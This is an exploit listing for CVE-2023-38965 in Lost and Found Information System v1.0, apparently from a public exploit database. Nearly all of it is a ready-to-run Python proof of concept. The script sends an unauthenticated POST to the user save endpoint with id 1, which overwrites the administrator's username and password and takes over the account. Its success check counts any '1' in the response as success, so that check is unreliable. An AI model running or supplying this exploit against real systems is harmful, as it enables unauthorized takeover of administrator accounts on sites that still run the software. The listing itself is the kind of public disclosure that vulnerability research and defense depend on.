FlyFar

Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over - CVE-2023-38965

Feb 14th, 2024
# Exploit Title: Lost and Found Information System v1.0 - IDOR leads to Account Takeover
# Date: 2023-07-16
# Exploit Author: OR4NG.M4N
# Category: webapps
# Tested on: Windows/Linux

# Python PoC:

import argparse
import requests
import time

parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()

# User save endpoint; the request below carries no session cookie or token.
url = args.url + '/classes/Users.php?f=save'

# 'id' is supplied by the client: the record with this id is overwritten
# with the username and password given on the command line.
data = {
    'id': '1',
    'firstname': 'Az7rb',
    'middlename': '',
    'lastname': 'Admin',
    'username': args.user,
    'password': args.password
}

response = requests.post(url, data=data)
# The PoC treats a "1" anywhere in the response body as success.
if b"1" in response.content:
    print("Exploit ..")
    time.sleep(1)
    print("User :" + args.user + "\nPassword :" + args.password)
else:
    print("Exploit Failed..")